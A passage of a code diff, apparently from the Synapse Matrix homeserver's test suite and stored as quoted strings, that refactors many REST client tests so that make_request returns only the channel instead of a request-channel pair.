\"PUT\",", - "@@ -106,3 +106,3 @@ class ThirdPartyRulesTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -125,3 +125,3 @@ class ThirdPartyRulesTestCase(unittest.HomeserverTestCase):", - " # now send the event", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -144,3 +144,3 @@ class ThirdPartyRulesTestCase(unittest.HomeserverTestCase):", - " # now send the event", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -154,3 +154,3 @@ class ThirdPartyRulesTestCase(unittest.HomeserverTestCase):", - " # ... and check that it got modified", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "diff --git a/tests/rest/client/v1/test_directory.py b/tests/rest/client/v1/test_directory.py", - "index 7a2c653df..edd1d184f 100644", - "--- a/tests/rest/client/v1/test_directory.py", - "+++ b/tests/rest/client/v1/test_directory.py", - "@@ -93,3 +93,3 @@ class DirectoryTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps(data)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", url, request_data, access_token=self.user_tok", - "@@ -106,3 +106,3 @@ class DirectoryTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps(data)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", url, request_data, access_token=self.user_tok", - "@@ -120,3 +120,3 @@ class DirectoryTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", url, request_data, access_token=self.user_tok", - "@@ -130,3 +130,3 @@ class DirectoryTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", url, request_data, access_token=self.user_tok", - "diff --git a/tests/rest/client/v1/test_events.py b/tests/rest/client/v1/test_events.py", - "index 12a93f568..0a5ca317e 100644", - "--- a/tests/rest/client/v1/test_events.py", - "+++ b/tests/rest/client/v1/test_events.py", - "@@ -65,3 +65,3 @@ class EventStreamPermissionsTestCase(unittest.HomeserverTestCase):", - " # see issue #2602", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/events?access_token=%s\" % (\"invalid\" + self.token,)", - "@@ -71,3 +71,3 @@ class EventStreamPermissionsTestCase(unittest.HomeserverTestCase):", - " # valid token, expect content", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/events?access_token=%s&timeout=0\" % (self.token,)", - "@@ -89,3 +89,3 @@ class EventStreamPermissionsTestCase(unittest.HomeserverTestCase):", - " # valid token, expect content", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/events?access_token=%s&timeout=0\" % (self.token,)", - "@@ -151,3 +151,3 @@ class GetEventsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/events/\" + event_id, access_token=self.token,", - "diff --git a/tests/rest/client/v1/test_login.py b/tests/rest/client/v1/test_login.py", - "index 176ddf7ec..041f2766d 100644", - "--- a/tests/rest/client/v1/test_login.py", - "+++ b/tests/rest/client/v1/test_login.py", - "@@ -65,3 +65,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " }", - "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "@@ -84,3 +84,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " }", - "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "@@ -110,3 +110,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " }", - "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "@@ -129,3 +129,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " }", - "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "@@ -155,3 +155,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " }", - "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "@@ -174,3 +174,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " }", - "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "@@ -183,3 +183,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " # we shouldn't be able to make requests without an access token", - "- request, channel = self.make_request(b\"GET\", TEST_URL)", - "+ channel = self.make_request(b\"GET\", TEST_URL)", - " self.assertEquals(channel.result[\"code\"], b\"401\", channel.result)", - "@@ -193,3 +193,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " }", - "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "@@ -200,5 +200,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " # we should now be able to make requests with the access token", - "- request, channel = self.make_request(", - "- b\"GET\", TEST_URL, access_token=access_token", - "- )", - "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", - " self.assertEquals(channel.code, 200, channel.result)", - "@@ -209,5 +207,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " # ... and we should be soft-logouted", - "- request, channel = self.make_request(", - "- b\"GET\", TEST_URL, access_token=access_token", - "- )", - "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", - " self.assertEquals(channel.code, 401, channel.result)", - "@@ -225,5 +221,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " self.reactor.advance(3600)", - "- request, channel = self.make_request(", - "- b\"GET\", TEST_URL, access_token=access_token", - "- )", - "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", - " self.assertEquals(channel.code, 401, channel.result)", - "@@ -235,5 +229,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- b\"GET\", TEST_URL, access_token=access_token", - "- )", - "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", - " self.assertEquals(channel.code, 401, channel.result)", - "@@ -244,3 +236,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " \"\"\"Perform the UI-Auth to delete a device\"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " b\"DELETE\", \"devices/\" + device_id, access_token=access_token", - "@@ -264,3 +256,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " b\"DELETE\",", - "@@ -280,5 +272,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " # we should now be able to make requests with the access token", - "- request, channel = self.make_request(", - "- b\"GET\", TEST_URL, access_token=access_token", - "- )", - "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", - " self.assertEquals(channel.code, 200, channel.result)", - "@@ -289,5 +279,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " # ... and we should be soft-logouted", - "- request, channel = self.make_request(", - "- b\"GET\", TEST_URL, access_token=access_token", - "- )", - "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", - " self.assertEquals(channel.code, 401, channel.result)", - "@@ -297,5 +285,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " # Now try to hard logout this session", - "- request, channel = self.make_request(", - "- b\"POST\", \"/logout\", access_token=access_token", - "- )", - "+ channel = self.make_request(b\"POST\", \"/logout\", access_token=access_token)", - " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", - "@@ -310,5 +296,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " # we should now be able to make requests with the access token", - "- request, channel = self.make_request(", - "- b\"GET\", TEST_URL, access_token=access_token", - "- )", - "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", - " self.assertEquals(channel.code, 200, channel.result)", - "@@ -319,5 +303,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " # ... and we should be soft-logouted", - "- request, channel = self.make_request(", - "- b\"GET\", TEST_URL, access_token=access_token", - "- )", - "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", - " self.assertEquals(channel.code, 401, channel.result)", - "@@ -327,5 +309,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", - " # Now try to hard log out all of the user's sessions", - "- request, channel = self.make_request(", - "- b\"POST\", \"/logout/all\", access_token=access_token", - "- )", - "+ channel = self.make_request(b\"POST\", \"/logout/all\", access_token=access_token)", - " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", - "@@ -404,3 +384,3 @@ class CASTestCase(unittest.HomeserverTestCase):", - " # Get Synapse to call the fake CAS and serve the template.", - "- request, channel = self.make_request(\"GET\", cas_ticket_url)", - "+ channel = self.make_request(\"GET\", cas_ticket_url)", - "@@ -448,3 +428,3 @@ class CASTestCase(unittest.HomeserverTestCase):", - " # Get Synapse to call the fake CAS and serve the template.", - "- request, channel = self.make_request(\"GET\", cas_ticket_url)", - "+ channel = self.make_request(\"GET\", cas_ticket_url)", - "@@ -474,3 +454,3 @@ class CASTestCase(unittest.HomeserverTestCase):", - " # Get Synapse to call the fake CAS and serve the template.", - "- request, channel = self.make_request(\"GET\", cas_ticket_url)", - "+ channel = self.make_request(\"GET\", cas_ticket_url)", - "@@ -504,3 +484,3 @@ class JWTTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", - " return channel", - "@@ -636,3 +616,3 @@ class JWTTestCase(unittest.HomeserverTestCase):", - " params = json.dumps({\"type\": \"org.matrix.login.jwt\"})", - "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", - " self.assertEqual(channel.result[\"code\"], b\"403\", channel.result)", - "@@ -709,3 +689,3 @@ class JWTPubKeyTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", - " return channel", - "@@ -737,3 +717,3 @@ class AppserviceLoginRestServletTestCase(unittest.HomeserverTestCase):", - " def register_as_user(self, username):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " b\"POST\",", - "@@ -786,3 +766,3 @@ class AppserviceLoginRestServletTestCase(unittest.HomeserverTestCase):", - " }", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " b\"POST\", LOGIN_URL, params, access_token=self.service.token", - "@@ -801,3 +781,3 @@ class AppserviceLoginRestServletTestCase(unittest.HomeserverTestCase):", - " }", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " b\"POST\", LOGIN_URL, params, access_token=self.service.token", - "@@ -816,3 +796,3 @@ class AppserviceLoginRestServletTestCase(unittest.HomeserverTestCase):", - " }", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " b\"POST\", LOGIN_URL, params, access_token=self.service.token", - "@@ -831,3 +811,3 @@ class AppserviceLoginRestServletTestCase(unittest.HomeserverTestCase):", - " }", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " b\"POST\", LOGIN_URL, params, access_token=self.another_service.token", - "@@ -847,3 +827,3 @@ class AppserviceLoginRestServletTestCase(unittest.HomeserverTestCase):", - " }", - "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", - "diff --git a/tests/rest/client/v1/test_presence.py b/tests/rest/client/v1/test_presence.py", - "index 11cd8efe2..94a515483 100644", - "--- a/tests/rest/client/v1/test_presence.py", - "+++ b/tests/rest/client/v1/test_presence.py", - "@@ -55,3 +55,3 @@ class PresenceTestCase(unittest.HomeserverTestCase):", - " body = {\"presence\": \"here\", \"status_msg\": \"beep boop\"}", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", \"/presence/%s/status\" % (self.user_id,), body", - "@@ -70,3 +70,3 @@ class PresenceTestCase(unittest.HomeserverTestCase):", - " body = {\"presence\": \"here\", \"status_msg\": \"beep boop\"}", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", \"/presence/%s/status\" % (self.user_id,), body", - "diff --git a/tests/rest/client/v1/test_profile.py b/tests/rest/client/v1/test_profile.py", - "index 2a3b483ea..e59fa70ba 100644", - "--- a/tests/rest/client/v1/test_profile.py", - "+++ b/tests/rest/client/v1/test_profile.py", - "@@ -191,3 +191,3 @@ class ProfileTestCase(unittest.HomeserverTestCase):", - " def test_set_displayname(self):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -204,3 +204,3 @@ class ProfileTestCase(unittest.HomeserverTestCase):", - " \"\"\"Attempts to set a stupid displayname should get a 400\"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -216,5 +216,3 @@ class ProfileTestCase(unittest.HomeserverTestCase):", - " def get_displayname(self):", - "- request, channel = self.make_request(", - "- \"GET\", \"/profile/%s/displayname\" % (self.owner,)", - "- )", - "+ channel = self.make_request(\"GET\", \"/profile/%s/displayname\" % (self.owner,))", - " self.assertEqual(channel.code, 200, channel.result)", - "@@ -280,3 +278,3 @@ class ProfilesRestrictedTestCase(unittest.HomeserverTestCase):", - " def request_profile(self, expected_code, url_suffix=\"\", access_token=None):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.profile_url + url_suffix, access_token=access_token", - "@@ -322,3 +320,3 @@ class OwnProfileUnrestrictedTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/profile/\" + self.requester, access_token=self.requester_tok", - "@@ -327,3 +325,3 @@ class OwnProfileUnrestrictedTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -334,3 +332,3 @@ class OwnProfileUnrestrictedTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "diff --git a/tests/rest/client/v1/test_push_rule_attrs.py b/tests/rest/client/v1/test_push_rule_attrs.py", - "index 7add5523c..2bc512d75 100644", - "--- a/tests/rest/client/v1/test_push_rule_attrs.py", - "+++ b/tests/rest/client/v1/test_push_rule_attrs.py", - "@@ -47,3 +47,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # PUT a new rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", - "@@ -53,3 +53,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # GET enabled for that new rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", - "@@ -76,3 +76,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # PUT a new rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", - "@@ -82,3 +82,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # disable the rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -91,3 +91,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # check rule disabled", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", - "@@ -98,3 +98,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # DELETE the rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"DELETE\", \"/pushrules/global/override/best.friend\", access_token=token", - "@@ -104,3 +104,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # PUT a new rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", - "@@ -110,3 +110,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # GET enabled for that new rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", - "@@ -132,3 +132,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # PUT a new rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", - "@@ -138,3 +138,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # disable the rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -147,3 +147,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # check rule disabled", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", - "@@ -154,3 +154,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # re-enable the rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -163,3 +163,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # check rule enabled", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", - "@@ -184,3 +184,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # check 404 for never-heard-of rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", - "@@ -191,3 +191,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # PUT a new rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", - "@@ -197,3 +197,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # GET enabled for that new rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", - "@@ -203,3 +203,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # DELETE the rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"DELETE\", \"/pushrules/global/override/best.friend\", access_token=token", - "@@ -209,3 +209,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # check 404 for deleted rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", - "@@ -223,3 +223,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # check 404 for never-heard-of rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/pushrules/global/override/.m.muahahaha/enabled\", access_token=token", - "@@ -237,3 +237,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # enable & check 404 for never-heard-of rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -254,3 +254,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # enable & check 404 for never-heard-of rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -278,3 +278,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # PUT a new rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", - "@@ -284,3 +284,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # GET actions for that new rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/pushrules/global/override/best.friend/actions\", access_token=token", - "@@ -307,3 +307,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # PUT a new rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", - "@@ -313,3 +313,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # change the rule actions", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -322,3 +322,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # GET actions for that new rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/pushrules/global/override/best.friend/actions\", access_token=token", - "@@ -343,3 +343,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # check 404 for never-heard-of rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", - "@@ -350,3 +350,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # PUT a new rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", - "@@ -356,3 +356,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # DELETE the rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"DELETE\", \"/pushrules/global/override/best.friend\", access_token=token", - "@@ -362,3 +362,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # check 404 for deleted rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", - "@@ -376,3 +376,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # check 404 for never-heard-of rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/pushrules/global/override/.m.muahahaha/actions\", access_token=token", - "@@ -390,3 +390,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # enable & check 404 for never-heard-of rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -407,3 +407,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", - " # enable & check 404 for never-heard-of rule", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "diff --git a/tests/rest/client/v1/test_rooms.py b/tests/rest/client/v1/test_rooms.py", - "index 55d872f0e..6105eac47 100644", - "--- a/tests/rest/client/v1/test_rooms.py", - "+++ b/tests/rest/client/v1/test_rooms.py", - "@@ -86,3 +86,3 @@ class RoomPermissionsTestCase(RoomBase):", - " ).encode(\"ascii\")", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", self.created_rmid_msg_path, b'{\"msgtype\":\"m.text\",\"body\":\"test msg\"}'", - "@@ -92,3 +92,3 @@ class RoomPermissionsTestCase(RoomBase):", - " # set topic for public room", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -114,3 +114,3 @@ class RoomPermissionsTestCase(RoomBase):", - " # send message in uncreated room, expect 403", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -122,3 +122,3 @@ class RoomPermissionsTestCase(RoomBase):", - " # send message in created room not joined (no state), expect 403", - "- request, channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", - "+ channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", - " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", - "@@ -129,3 +129,3 @@ class RoomPermissionsTestCase(RoomBase):", - " )", - "- request, channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", - "+ channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", - " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", - "@@ -134,3 +134,3 @@ class RoomPermissionsTestCase(RoomBase):", - " self.helper.join(room=self.created_rmid, user=self.user_id)", - "- request, channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", - "+ channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -139,3 +139,3 @@ class RoomPermissionsTestCase(RoomBase):", - " self.helper.leave(room=self.created_rmid, user=self.user_id)", - "- request, channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", - "+ channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", - " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", - "@@ -147,3 +147,3 @@ class RoomPermissionsTestCase(RoomBase):", - " # set/get topic in uncreated room, expect 403", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", \"/rooms/%s/state/m.room.topic\" % self.uncreated_rmid, topic_content", - "@@ -151,3 +151,3 @@ class RoomPermissionsTestCase(RoomBase):", - " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/rooms/%s/state/m.room.topic\" % self.uncreated_rmid", - "@@ -157,5 +157,5 @@ class RoomPermissionsTestCase(RoomBase):", - " # set/get topic in created PRIVATE room not joined, expect 403", - "- request, channel = self.make_request(\"PUT\", topic_path, topic_content)", - "+ channel = self.make_request(\"PUT\", topic_path, topic_content)", - " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"GET\", topic_path)", - "+ channel = self.make_request(\"GET\", topic_path)", - " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", - "@@ -166,3 +166,3 @@ class RoomPermissionsTestCase(RoomBase):", - " )", - "- request, channel = self.make_request(\"PUT\", topic_path, topic_content)", - "+ channel = self.make_request(\"PUT\", topic_path, topic_content)", - " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", - "@@ -170,3 +170,3 @@ class RoomPermissionsTestCase(RoomBase):", - " # get topic in created PRIVATE room and invited, expect 403", - "- request, channel = self.make_request(\"GET\", topic_path)", - "+ channel = self.make_request(\"GET\", topic_path)", - " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", - "@@ -178,3 +178,3 @@ class RoomPermissionsTestCase(RoomBase):", - " self.helper.auth_user_id = self.rmcreator_id", - "- request, channel = self.make_request(\"PUT\", topic_path, topic_content)", - "+ channel = self.make_request(\"PUT\", topic_path, topic_content)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -182,3 +182,3 @@ class RoomPermissionsTestCase(RoomBase):", - "- request, channel = self.make_request(\"GET\", topic_path)", - "+ channel = self.make_request(\"GET\", topic_path)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -188,5 +188,5 @@ class RoomPermissionsTestCase(RoomBase):", - " self.helper.leave(room=self.created_rmid, user=self.user_id)", - "- request, channel = self.make_request(\"PUT\", topic_path, topic_content)", - "+ channel = self.make_request(\"PUT\", topic_path, topic_content)", - " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"GET\", topic_path)", - "+ channel = self.make_request(\"GET\", topic_path)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -194,3 +194,3 @@ class RoomPermissionsTestCase(RoomBase):", - " # get topic in PUBLIC room, not joined, expect 403", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/rooms/%s/state/m.room.topic\" % self.created_public_rmid", - "@@ -200,3 +200,3 @@ class RoomPermissionsTestCase(RoomBase):", - " # set topic in PUBLIC room, not joined, expect 403", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -210,3 +210,3 @@ class RoomPermissionsTestCase(RoomBase):", - " path = \"/rooms/%s/state/m.room.member/%s\" % (room, member)", - "- request, channel = self.make_request(\"GET\", path)", - "+ channel = self.make_request(\"GET\", path)", - " self.assertEquals(expect_code, channel.code)", - "@@ -382,3 +382,3 @@ class RoomsMemberListTestCase(RoomBase):", - " room_id = self.helper.create_room_as(self.user_id)", - "- request, channel = self.make_request(\"GET\", \"/rooms/%s/members\" % room_id)", - "+ channel = self.make_request(\"GET\", \"/rooms/%s/members\" % room_id)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -386,3 +386,3 @@ class RoomsMemberListTestCase(RoomBase):", - " def test_get_member_list_no_room(self):", - "- request, channel = self.make_request(\"GET\", \"/rooms/roomdoesnotexist/members\")", - "+ channel = self.make_request(\"GET\", \"/rooms/roomdoesnotexist/members\")", - " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", - "@@ -391,3 +391,3 @@ class RoomsMemberListTestCase(RoomBase):", - " room_id = self.helper.create_room_as(\"@some_other_guy:red\")", - "- request, channel = self.make_request(\"GET\", \"/rooms/%s/members\" % room_id)", - "+ channel = self.make_request(\"GET\", \"/rooms/%s/members\" % room_id)", - " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", - "@@ -400,3 +400,3 @@ class RoomsMemberListTestCase(RoomBase):", - " # can't see list if you're just invited.", - "- request, channel = self.make_request(\"GET\", room_path)", - "+ channel = self.make_request(\"GET\", room_path)", - " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", - "@@ -405,3 +405,3 @@ class RoomsMemberListTestCase(RoomBase):", - " # can see list now joined", - "- request, channel = self.make_request(\"GET\", room_path)", - "+ channel = self.make_request(\"GET\", room_path)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -410,3 +410,3 @@ class RoomsMemberListTestCase(RoomBase):", - " # can see old list once left", - "- request, channel = self.make_request(\"GET\", room_path)", - "+ channel = self.make_request(\"GET\", room_path)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -421,3 +421,3 @@ class RoomsCreateTestCase(RoomBase):", - " # POST with no config keys, expect new room id", - "- request, channel = 